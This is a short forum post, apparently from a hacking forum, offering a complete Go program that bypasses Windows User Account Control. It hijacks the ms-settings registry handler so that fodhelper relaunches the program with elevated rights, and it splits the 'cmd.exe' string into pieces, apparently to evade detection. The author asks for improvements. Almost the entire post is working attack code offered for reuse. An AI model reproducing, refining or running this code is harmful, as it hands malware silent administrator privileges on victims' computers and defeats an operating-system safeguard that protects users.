Hello, this is a UAC Bypass program written in Golang. If there is a better way, please recommend it.
Код:
package main
import (
"os"
"os/exec"
"syscall"
"unsafe"
re "golang.org/x/sys/windows/registry"
)
func IsAdmin() bool {
var infoPointer uintptr
syscall.NewLazyDLL("netapi32.dll").NewProc("NetUserGetInfo").Call(
0,
uintptr(unsafe.Pointer(syscall.StringToUTF16Ptr(os.Getenv("USERNAME")))),
1,
uintptr(unsafe.Pointer(&infoPointer)),
)
defer syscall.NewLazyDLL("netapi32.dll").NewProc("NetApiBufferFree").Call(infoPointer)
type user struct {
Username *uint16
Password *uint16
PasswordAge uint32
Priv uint32
HomeDir *uint16
Comment *uint16
Flags uint32
ScriptPath *uint16
}
info := (*user)(unsafe.Pointer(infoPointer))
return info.Priv == 2
}
func GetElevation() error {
k, _, err := re.CreateKey(re.CURRENT_USER,
"Software\\Classes\\ms-settings\\shell\\open\\command", re.ALL_ACCESS)
if err != nil {
return err
}
defer k.Close()
value, err := os.Executable()
if err != nil {
return err
}
if err = k.SetStringValue("", value); err != nil {
return err
}
if err = k.SetStringValue("DelegateExecute", ""); err != nil {
return err
}
cmd := exec.Command("c"+"m"+"d"+"."+"e"+"x"+"e", "/C", "fodhelper")
err = cmd.Run()
return err
}
func BypassUAC() {
if HasElevation() {
return
}
if !IsAdmin() {
return
}
err := GetElevation()
if err != nil {
return
}
os.Exit(0)
}
func HasElevation() bool {
ret, _, _ := syscall.NewLazyDLL("shell32.dll").NewProc("IsUserAnAdmin").Call()
return ret != 0
}